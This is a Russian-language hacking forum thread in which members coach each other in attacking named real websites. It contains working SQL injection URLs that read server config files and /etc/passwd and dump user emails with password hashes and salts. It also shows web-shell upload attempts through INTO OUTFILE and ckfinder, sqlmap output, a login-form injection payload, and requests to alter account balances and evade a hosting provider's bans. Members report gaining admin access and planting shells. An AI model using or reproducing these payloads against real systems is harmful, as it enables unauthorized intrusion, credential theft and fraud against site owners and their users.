я пробовал подставлять разные значения подходящие под Gento но я так и не смог отобразить на сайте абсолютный путь ресурса (
вот вам раскрытие, с соседней сайта. лучше смотрите
http://media-monitor.ru/admin
www.direct-line.ru/news_win.php?id=-2170 (http://www.direct-line.ru/news_win.php?id=-2170) union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/admin.php'),3,4--
http://www.direct-line.ru/news_win....-monitor.ru/www/kernel/cfg/config.php'),3,4-- (http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file%28'/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'%29,3,4--)
или под ваш ресурс поулчается - http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/direct-line.ru/www/index.php'),3,4-- (http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file%28%27/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php%27%29,3,4--)
С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан
Я начал искать новые ресурсы для обучения и практики
и так ресурс:
http://www.aza.com.ua
phpinfdo http://www.aza.com.ua/info.php
страница с раскрытием пути http://www.aza.com.ua/email/mail_form_short.html
немного о сервере
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current database: 'test'
current user is DBA: True
uniscan по ключу --qwe
показывает (если я правильно понял) папки с правами на запись
| Directory check:
| [+] CODE: 200 URL: http://www.aza.com.ua/banner/
| [+] CODE: 200 URL: http://www.aza.com.ua/cart/
| [+] CODE: 200 URL: http://www.aza.com.ua/conf/
| [+] CODE: 200 URL: http://www.aza.com.ua/doc/
| [+] CODE: 200 URL: http://www.aza.com.ua/email/
| [+] CODE: 200 URL: http://www.aza.com.ua/edit/
| [+] CODE: 200 URL: http://www.aza.com.ua/images/
| [+] CODE: 200 URL: http://www.aza.com.ua/img/
| [+] CODE: 200 URL: http://www.aza.com.ua/japan/
| [+] CODE: 200 URL: http://www.aza.com.ua/news/
| [+] CODE: 200 URL: http://www.aza.com.ua/orders/
| [+] CODE: 200 URL: http://www.aza.com.ua/pma/
| [+] CODE: 200 URL: http://www.aza.com.ua/quest/
| [+] CODE: 200 URL: http://www.aza.com.ua/user/
затем используя sqlmap-u сайт --os-cmd –v l
выбираю 4 (php)
затем на запрос куда лить - указываю адрес (судя с http://www.aza.com.ua/email/mail_form_short.html) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:
Code:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'
подскажите что я не так делаю ?
Проблема в пути который указываю в sqlmap
или в том что статус 200 в uniscan Не имеет в виду что права на запись есть
или еще что то ?
спасибо
RedFern.89
17.10.2015, 17:06
Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?
RedFern.89 said:
↑ (https://antichat.live/posts/3903684/)
Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?
Первый вопрос - https://rdot.org/forum/showthread.php?t=60
RedFern.89 said:
↑ (https://antichat.live/posts/3903684/)
Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?
использовать другие векторы, самый максимальный вывод - через big into, 450+ символов. можно найти на рдоте остальные.
автоматизировать с помощью любого яп, удобнее и проще выбрать php или python.
AlexG said:
↑ (https://antichat.live/posts/3903686/)
Первый вопрос -
https://rdot.org/forum/showthread.php?t=60
https://rdot.org/forum/showthread.php?t=3257
RedFern.89
17.10.2015, 17:29
Code:
and+extractvalue(0x3a,concat(0x3a,(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 2,1)))and'-1/
Помогите преобразовать под другой вектор, пожалуйста
RedFern.89 said:
↑ (https://antichat.live/posts/3903693/)
Code:
and+extractvalue(0x3a,concat(0x3a,(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 2,1)))and'-1/
Помогите преобразовать под другой вектор, пожалуйста
Предположу что выглядеть может как-то так:
Code:
+|(select!x-~0.FROM(select+(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 1,1)x)f)and'-1/
Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.
Ребята как слить!
Code:
Request
POST /pokladna.php3?zmen_pocet=1 HTTP/1.1
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.site/index.php3
Cookie: zakaznik=54232320171015; mena=kc; PHPSESSID=e65098cea0bfe728376afb73aecdfa9a; poslednipokladna=http%3A%2F%2Fwww.xzone.cz%2Fnovin ky.php3; PAPCookie_Imp_90792bb8=pap; A=0e64cc89bb5bb899f9c35e353152dda1; PAPCookie_Imp_=pap; M=d8a3af2bf6e34bc085d8077ee2f169e8; PAPCookie_Imp_11110001=pap; PAPCookie_Imp_11110002=pap; T_pap_sid=c5435b85e7695cc26819e282204671aa; PAPVisitorId=855a30dc32b3e6caeff8ed45d7f43e88; pinst=0ea803e135aa19014ec315b34f3f2567; I_pap_sid=7323f7a4ad1d3c86292e465bf78514b5; I=70f4c5f3bd4e0f3aeb9ca8d9847fefae; __utmt=1; __utma=105760714.564703462.1445165254.1445165254.1 445165254.1; __utmb=105760714.11.10.1445165254; __utmc=105760714; __utmz=105760714.1445165254.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utm cct=/javascript:domxssExecutionSink(0,"'\">()refdxss"); __utmli=info_title
Host: www.site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
druh%5b%5d=xbox360&idhry%5b%5d=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b( select(0)from(select(sleep(0)))v)%2b%22*/&pocet%5b%5d=1
http://i.shotnes.com/a/17/5h144kmo.ijb_562271d10c4de.png
немогу уже больше( это как пример !! уязвимостей у меня есть очень много но ничего не получается !! если кто подробнее сможет помочь отпишите плз в icq 660668871 буду благодарен ! или хотябы тут как вот ету слить .
ПРивет Всем. Извините за тупой вопрос. НО
Имеем
id
pid
email
psw
name
family
phone
icq
who
count_rur
curr_num
top10_login
notshow_top10_login
dataadd administrator
moderator
last_data_auth
last_data_update
hash action
Таблица adtram_users
Нужно прописать запрос на добавление денег. Сюда: count_rur
как ? Плиз -
update adtram_users set count_rur = * where id=*
yarbabin said:
↑ (https://antichat.live/posts/3903757/)
update adtram_users set count_rur = * where id=*
почемут не получилось(
Если прав нет и не получится так понимаю.? и есть ли возможность их получить*
Это тизерка. За помощь дам фтп . тоесть на 2их будет
yarbabin said:
↑ (https://antichat.live/posts/3903771/)
уточните все условия
+ Не заметил.
!!!!!!!!
BabaDook
18.10.2015, 01:02
Br@!ns said:
↑ (https://antichat.live/posts/3903579/)
вот вам раскрытие, с соседней сайта. лучше смотрите
http://media-monitor.ru/admin
www.direct-line.ru/news_win.php?id=-2170 (http://www.direct-line.ru/news_win.php?id=-2170)
union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/admin.php'),3,4--
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'),3,4-- (http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file%28'/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'%29,3,4--)
или под ваш ресурс поулчается -
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/direct-line.ru/www/index.php'),3,4-- (http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file%28%27/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php%27%29,3,4--)
я СОСЕДНИЙ САЙТ ТОЖЕ СМОТРЕЛ.
/var/www/localhost/htdocs/media-monitor.ru/www/
/var/www/localhost/htdocs/media-monitor.ru/www/kernel/ такой путь догадка была ?
RedFern.89
18.10.2015, 07:37
AlexG said:
↑ (https://antichat.live/posts/3903712/)
Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.
все работает, спасибо. осталось лишь автоматизировать
RedFern.89 said:
↑ (https://antichat.live/posts/3903872/)
все работает, спасибо. осталось лишь автоматизировать
Ну раз работает, то это уже хорошо По автоматизации, как выше уже сказал yarbabin (https://antichat.live/members/45288/) - php или другой яп. Я взял бы за основу какой-нибудь HTML-парсер и засунул его в цикл.
kingbeef
18.10.2015, 08:50
aldemko said:
↑ (https://antichat.live/posts/3903673/)
С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан
Я начал искать новые ресурсы для обучения и практики
и так ресурс:
http://www.aza.com.ua
phpinfdo
http://www.aza.com.ua/info.php
страница с раскрытием пути
http://www.aza.com.ua/email/mail_form_short.html
немного о сервере
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current database: 'test'
current user is DBA: True
uniscan по ключу --qwe
показывает (если я правильно понял) папки с правами на запись
| Directory check:
| [+] CODE: 200 URL:
http://www.aza.com.ua/banner/
| [+] CODE: 200 URL:
http://www.aza.com.ua/cart/
| [+] CODE: 200 URL:
http://www.aza.com.ua/conf/
| [+] CODE: 200 URL:
http://www.aza.com.ua/doc/
| [+] CODE: 200 URL:
http://www.aza.com.ua/email/
| [+] CODE: 200 URL:
http://www.aza.com.ua/edit/
| [+] CODE: 200 URL:
http://www.aza.com.ua/images/
| [+] CODE: 200 URL:
http://www.aza.com.ua/img/
| [+] CODE: 200 URL:
http://www.aza.com.ua/japan/
| [+] CODE: 200 URL:
http://www.aza.com.ua/news/
| [+] CODE: 200 URL:
http://www.aza.com.ua/orders/
| [+] CODE: 200 URL:
http://www.aza.com.ua/pma/
| [+] CODE: 200 URL:
http://www.aza.com.ua/quest/
| [+] CODE: 200 URL:
http://www.aza.com.ua/user/
затем используя sqlmap-u сайт --os-cmd –v l
выбираю 4 (php)
затем на запрос куда лить - указываю адрес (судя с
http://www.aza.com.ua/email/mail_form_short.html
) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:
Code:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'
подскажите что я не так делаю ?
Проблема в пути который указываю в sqlmap
или в том что статус 200 в uniscan Не имеет в виду что права на запись есть
или еще что то ?
спасибо
Шелл туда давно уже залит)
/threads/21336/page-796#post-3820554 (https://antichat.live/threads/21336/page-796/)
я понимаю что залит
я хочу тоже залить
и спросил в чем моя ошибка а не в том что есть люди которые уже залили
у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня
kingbeef
18.10.2015, 11:51
aldemko said:
↑ (https://antichat.live/posts/3903890/)
я понимаю что залит
я хочу тоже залить
и спросил в чем моя ошибка а не в том что есть люди которые уже залили
у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня
Пробуй заливать руками, а не софтом, ищи папку с правами, например папка с картинками.
Здравствуйте,вопрос в следующем, я правильно понимаю,что чтобы залить шелл надо иметь доптуп к админке а соответственно знать логин пасс, дак ведь их можно узнать только через уязвимость а если у меня будет такая уязвимость значит я смогу и слить базу соответственно зачем мне уже заливать шелл дак вот вопрос заключается в следующем: как залить шелл незная логина и пароля админа?
ButilkaSoka
18.10.2015, 14:14
Как обойти фильтр кавычки при заливке шелла через sqli?
Когда есть кавычка в into outfile 'путь', то выводит ошибку \' /путь \'
ButilkaSoka said:
↑ (https://antichat.live/posts/3903958/)
Как обойти фильтр кавычки при заливке шелла через sqli?
Когда есть кавычка в into outfile 'путь', то выводит ошибку
\'
/путь
\'
прочитайте в большом факе условия для заливки. и способ scipio
HTML:
www_europarchive_org/item.php?id=lp-00624_BeG
как можно раскрутить?
kingbeef
18.10.2015, 15:23
ButilkaSoka said:
↑ (https://antichat.live/posts/3903958/)
Как обойти фильтр кавычки при заливке шелла через sqli?
Когда есть кавычка в into outfile 'путь', то выводит ошибку
\'
/путь
\'
Единственный вариант при фильтрации ковычек, работает редко.
/threads/43966/page-2#post-663815 (https://antichat.live/threads/43966/page-2/)
Win32BOT
18.10.2015, 16:18
Как посмотреть файловые привилегии пользователя в MariaDB?
По MySQL все понятно:
http://localhost/sql/test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--+
Помогите разобраться
Win32BOT said:
↑ (https://antichat.live/posts/3904003/)
Как посмотреть файловые привилегии пользователя в MariaDB?
По MySQL все понятно:
http://localhost/sql/test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--+
Помогите разобраться
https://mariadb.com/kb/en/mariadb/mysqluser-table/
И вообще достаточно прочитать какой-нибудь файл через load_file()
R3hab said:
↑ (https://antichat.live/posts/3903975/)
HTML:
www_europarchive_org/item.php?id=lp-00624_BeG
как можно раскрутить?
Реально интересный пример.
Видно часть запроса, но чет ничего не получается.
Code:
http://www.europarchive.org/item.php?id=lp-00624_BeG'
Мастера, будьте любезны - просветите что тут и как.
R3hab said:
↑ (https://antichat.live/posts/3903975/)
HTML:
www_europarchive_org/item.php?id=lp-00624_BeG
как можно раскрутить?
С этой непонятно, но рядом есть другая
http://www.europarchive.org/userCon...oken=421e73828fd4888cd36749ee1ad64a50f46 22c89 (http://www.europarchive.org/userConfirm.php?email=lgfhfg@mail.ru'/**/union/**/select/**/null,null,null,null,null,null+--+&token=421e73828fd4888cd36749ee1ad64a50f4622c89)
Думаю вам сюда /threads/35599/ (https://antichat.live/threads/35599/)
kacergei
19.10.2015, 00:25
ПОдскажите как избежать бана вот этого хостера hostpro.ua
Как выставлять кол-во запросов в таких приложениях как fierce, nikto, unicorn
сразу в бан ухожу((
RedFern.89
19.10.2015, 00:58
AlexG said:
↑ (https://antichat.live/posts/3903882/)
Ну раз работает, то это уже хорошо
По автоматизации, как выше уже сказал
yarbabin (https://antichat.live/members/45288/)
- php или другой яп. Я взял бы за основу какой-нибудь HTML-парсер и засунул его в цикл.
проблема в том, что в браузере по прежнему отображается ошибка, через http editor данные вытаскиваются, как быть?
Доброго времени суток
я совсем совсем новичек
и так имеем мануал /threads/43966/ (https://antichat.live/threads/43966/)
затем через гугл ищу
Code:
inurl:news-full.php?id=
нашел ресурс
Code:
http://herorace.ru/news-full.php?id=1
при запросе
Code:
http://herorace.ru/news-full.php?id=1%27
выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/u0093899/data/www/herorace.ru/news-full.php on line70
следуя по мануалу пишу еще один запрос http://herorace.ru/news-full.php?id=1 --
отображает тоже что и просто с 1 - опять же судя по мануалу все ок
дальше следуя по мануалу нужно найти число столбцов я использовал 1' UNION SELECT 1, 2 --
получалось http://herorace.ru/news-full.php?id=1' UNION SELECT 1, 2 --
пробовал после прописывать цифры, 3 и так далее, ошибка со страницы не пропадала, и я решил попробовать с кол-вом полей
1' GROUP BY 2 -- ошибка
1' GROUP BY 10 -- ошибка
1' GROUP BY 100 --
1' GROUP BY 1 -- ошибка - и тут я понял что я наверное что то не так делаю, так как в любом случае полей не может быть меньше чем 1
я решил попробовать 1' GROUP BY 0 -- и тоже ошибка
подскажите что не так делаю ?
спасиобо
aldemko said:
↑ (https://antichat.live/posts/3904238/)
подскажите что не так делаю ?
В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.
http://herorace.ru/news-full.php?id=1+order+by+1+--+ - TRUE
http://herorace.ru/news-full.php?id=1+order+by+7+--+ - FALSE
http://herorace.ru/news-full.php?id=1+union+select+1,2,3,4,5,6+--+ - TRUE
Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные
http://herorace.ru/news-full.php?id=999999991+union+select+1,2,3,4,5,6+--+
профит
http://herorace.ru/news-full.php?id=999999991+union+select+1,2,version(),4 ,user(),6+--+
не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть
aldemko said:
↑ (https://antichat.live/posts/3904238/)
подскажите что не так делаю ?
спасиобо
Br@!ns said:
↑ (https://antichat.live/posts/3904272/)
В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.
http://herorace.ru/news-full.php?id=1+order+by+1+--+
- TRUE
http://herorace.ru/news-full.php?id=1+order+by+7+--+
- FALSE
http://herorace.ru/news-full.php?id=1+union+select+1,2,3,4,5,6+--+
- TRUE
Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные
http://herorace.ru/news-full.php?id=999999991+union+select+1,2,3,4,5,6+--+
профит
http://herorace.ru/news-full.php?id=999999991+union+select+1,2,version(),4 ,user(),6+--+
не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть
Хотел добавить - мануалы это НЕ инструкция к конкретным типам сайтов, это всего лишь общий алгоритм действий, а для понимания каждой конкретной ситуации мануалов надо прочитать много. И при поиске по доркам абсолютно не факт, что вы найдете сайты с аналогичными уязвимостями. Причин для этого много - например этот сайт уже ломали и кодер уже пытался "залатать" дыру.
В песочнице, в конкурсе много сайтов живых и уже "расковырянных" - попробуйте с ними "поиграться".
Ну и мое решение к этому вопросу:
Code:
http://herorace.ru/news-full.php?id=-1 union select 1,2,version(),4,database(),6
и еще такой вопрос в продолжение к этому примеру если можно
допустим я дошел до
Code:
+union+select+1,2,3,4,5,6+--+
значения version() и database() методом ручной вставки в каждй столб вместо цифр вставлять или существует закономерность ?
к примеру я изменив запрос на
Code:
с 1,2,version(),4,database(),6 на 1,2,3,4,5,database()+--+ уже не получаю вывод базы на сайте
PS Хотя нет получаю, только выводятся уже в другом месте - нашел в исходном коде
спасибо
PS 2 показывает что
current user is DBA: False
это значит залиться через уязвимость не получиться и искать другие ресурсы ?
PS 3 /threads/426171/page-5#post-3904335 (https://antichat.live/threads/426171/page-5/) мой первый самостоятельный сайт
Еще пожалуйста по синтаксису помогите
в общем столбцы узнал, базу узнал, права на запись есть
файл passwd читается
Code:
0+UNION+SELECT+1,2,3,4,5,6,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+
нашел предположительные папки на запись
пробую различные состявлять запросы на заливку файла пока не выходит
Code:
0+UNION+SELECT+1,2,3,%27%27,5,6%20INTO%20OUTFILE%2 0%27/1.php%27,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+
затем я еще раз просмотрел почтовый ящик где мне мистер Br@!ns, давал рекомендации и практические примеры
получился запрос 0+UNION+SELECT+1,2,%27%27,4,5,6,7,8,9,10++into+out file+%27/home/tesis/docs/123.php%27+--++--+
который кстати как по мне работает - только вот в ответ Can't create/write to file '/home/tesis/docs/123.php' (Errcode: 13) - но это уже говорит (я так думаю) о том что сам запрос верно составлен
Теперь возникает вопрос, как искать доступные для записи папки ?
я искал софтом uniscan - Но он показал что эта папка доступна для записи - точнее статус 200. но записаться я туда не могу почему то
Подскажите как правильно искать папки для записи
спасибо
или все же запрос не правильно построил
Вопрос все еще пока для меня актуален
как найти папки для записи ? я в ручную уже за..... перебирать, там куча папок с под папками и прочее
спасибо
PS так же не понятки с @@basedir - показывает что домашняя папка /usr/ - но путь не раскрывает
а ошибка на сайте указывает что сайт находится по /home/tesis/
кому верить ?
может изза не верно укзааного пути, я и не могу файл записать а uniscan не врал и папки действительно разрешены для записи
ButilkaSoka
19.10.2015, 15:52
RedFern.89 said:
↑ (https://antichat.live/posts/3904177/)
проблема в том, что в браузере по прежнему отображается ошибка, через http editor данные вытаскиваются, как быть?
Использовать Burp Suite, символ %20 заменить на пробел.
RedFern.89
19.10.2015, 19:26
ButilkaSoka said:
↑ (https://antichat.live/posts/3904363/)
Использовать Burp Suite, символ %20 заменить на пробел
а автоматизировать весь процесс через него тоже возможно? то есть перебор limit'a?
Есть linux 2.6.32-042, шелл исполняется под права apache.
В php.ini пустая строка в disable_functions, но не дает менять права на файлы, пробовал через php и через system.
Возможно ли как нибудь повысить права?
Находил вот такой эксплойт _ttps://www.exploit-db.com/exploits/18411/ (http://www.exploit-db.com/exploits/18411/) , но что-то не догоню как его использовать.
RedFern.89
19.10.2015, 20:13
ButilkaSoka said:
↑ (https://antichat.live/posts/3904363/)
Использовать Burp Suite, символ %20 заменить на пробел.
если его заменить на пробел, то запрос прерывается в burp suite на
Code:
/1'+(select!x-~0.FROM(select+(select
ButilkaSoka
19.10.2015, 21:33
RedFern.89 said:
↑ (https://antichat.live/posts/3904472/)
если его заменить на пробел, то запрос прерывается в burp suite на
Code:
/1'+(select!x-~0.FROM(select+(select
Code:
/news'+(select!x-~0.FROM(select+(select concat() )x)f)='/
RedFern.89
19.10.2015, 22:06
ButilkaSoka said:
↑ (https://antichat.live/posts/3904505/)
/news'+(select!x-~0.FROM(select+(select concat() )x)f)='/
не помогло
RedFern.89
19.10.2015, 23:55
ButilkaSoka said:
↑ (https://antichat.live/posts/3904533/)
/news'and(select!x-~0.FROM(select+(select concat(0x3c62723e,name,0x3c62723e) from ipb_members where member_id='15664')x)f)and'/
http://prntscr.com/8t332x
через браузер. через burp suite запрос прерывается там же
Code:
/news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c6 2723e))from(ipb_members)where(member_id='15664'))x )f)and'/
RedFern.89
20.10.2015, 00:05
yarbabin said:
↑ (https://antichat.live/posts/3904578/)
/news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c6 2723e))from(ipb_members)where(member_id='15664'))x )f)and'/
спасибо, все работает
SaNDER said:
↑ (https://antichat.live/posts/3904632/)
_ttp://vulkan.site/.htaccess
Code:
RewriteEngine On
RewriteRule ^go/([p0-9]*)/([a-zA-Z0-9]+)/?$ /go.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^go/([p0-9]*)/?$ /go.php?pid=$1 [QSA,L]
RewriteRule ^imp/([p0-9]*)/([a-zA-Z0-9]+)/?$ /imp.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^imp/([p0-9]*)/?$ /imp.php?pid=$1 [QSA,L]
RewriteRule ^events/([A-Za-z]+)/?$ /eventapi/api.php?action=$1 [QSA,L]
RewriteRule ^[A-Za-z0-9]+/(p[0-9]+)/([a-zA-Z0-9]+)/?$ /index.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^[A-Za-z0-9]+/(p[0-9]+)/?$ /index.php?pid=$1 [QSA,L]
RewriteRule ^(p[0-9]*)/([a-zA-Z0-9]+)/?$ /index.php?pid=$1&tid=$2 [QSA]
RewriteRule ^(p[0-9]*)/?$ /index.php?pid=$1 [QSA]
Можно что-нибудь сделать?
можно узнать, как настроен rewriterule. а что вы хотите?
http://www.bogema-hotel.ru/access_admin.php в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться
xivi00 said:
↑ (https://antichat.live/posts/3904924/)
http://www.bogema-hotel.ru/access_admin.php
в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="authorize"\r\n
\r\n
1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="login"\r\n
\r\n
admin'or(ExtractValue(1,concat(0x3a,(select(versio n())))))='1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
sdsdgsg\r\n
-----------------------------219001973211145--\r\n
зачем sqlmap здесь?
Br@!ns said:
↑ (https://antichat.live/posts/3904927/)
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="authorize"\r\n
\r\n
1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="login"\r\n
\r\n
admin'or(ExtractValue(1,concat(0x3a,(select(versio n())))))='1\r\n
-----------------------------219001973211145\r\n
Content-Disposition: form-data; name="password"\r\n
\r\n
sdsdgsg\r\n
-----------------------------219001973211145--\r\n
зачем sqlmap здесь?
руками не дорос еще крутить
[/URL]
(https://antichat.live/threads/424557/page-13/)
[URL="https://antichat.live/threads/424557/page-13/"]xivi00 said: (https://antichat.live/threads/424557/page-13/)
↑ (https://antichat.live/posts/3904924/)
http://www.bogema-hotel.ru/access_admin.php
в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться
/threads/424557/page-13#post-3861751 (https://antichat.live/threads/424557/page-13/)
kacergei
21.10.2015, 11:31
помогите пожалуйста здесь в ckfinder'e 1.4.2 можно как нибудь шел залить?
Как только не пробывал и через форму отдельную к connector'y и так
Получается так; _php;.txt
загруженный шел;
.SpoilerTarget" type="button">Spoiler: shell
aromagiya.kz/cms/uploads/files/Sh3LL_php;.txt
ckfinder:
.SpoilerTarget" type="button">Spoiler: ckfinder
aromagiya.kz/cms/files/appends/ckfinder/ckfinder.html
Для чего в шеллах есть пункт "Bind port to /bin/sh [perl]", и порт указан 31337 ?
Как и когда это использовать, объясните если не трудно
Waki said:
↑ (https://antichat.live/posts/3905323/)
Для чего в шеллах есть пункт "Bind port to /bin/sh [perl]", и порт указан 31337 ?
Как и когда это использовать, объясните если не трудно
для бэк коннекта, для порута сервера
Br@!ns said:
↑ (https://antichat.live/posts/3905340/)
для бэк коннекта, для порута сервера
где можно почитать об этом подробней? я не до конца понимаю как это делается, нажать в шелле, а что дальше неизвестно)
Waki said:
↑ (https://antichat.live/posts/3905344/)
где можно почитать об этом подробней? я не до конца понимаю как это делается, нажать в шелле, а что дальше неизвестно)
в закрепленных темах в этом разделе есть тема "повышение привилегий"
Можно ли както слить базу?!
.SpoilerTarget" type="button">Spoiler: Скрин
http://i.shotnes.com/a/21/a1rh32f0.ngc_5627d4b09718d.png
.SpoilerTarget" type="button">Spoiler: и тут
http://i.shotnes.com/a/21/admfrjvo.ojp_5627da3fca52e.png
или подскажите в icq 660668871
RedFern.89
22.10.2015, 00:28
Roger96 said:
↑ (https://antichat.live/posts/3905354/)
или подскажите в icq 660668871
mysql time based там
RedFern.89 said:
↑ (https://antichat.live/posts/3905393/)
mysql time based там
на первом или втором? и как ее раскрутить? ну базу слить
RedFern.89
22.10.2015, 02:09
Roger96 said:
↑ (https://antichat.live/posts/3905400/)
на первом или втором? и как ее раскрутить? ну базу слить
первом, через sqlmap спокойно льется
RedFern.89 said:
↑ (https://antichat.live/posts/3905411/)
первом, через sqlmap спокойно льется
дану? это где js library? а не подскажешь запрос как сдампить? плиз
Не сказать что норм льется: http://i.shotnes.com/a/22/1uwpgh51.ozp_56281388e029e.png
Roger96 said:
↑ (https://antichat.live/posts/3905417/)
дану? это где js library? а не подскажешь запрос как сдампить? плиз
Не сказать что норм льется:
http://i.shotnes.com/a/22/1uwpgh51.ozp_56281388e029e.png
что это за породи я на sqlmap
xivi00 said:
↑ (https://antichat.live/posts/3905567/)
что это за породи я на sqlmap
посмотрел,сравнил - обычный
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot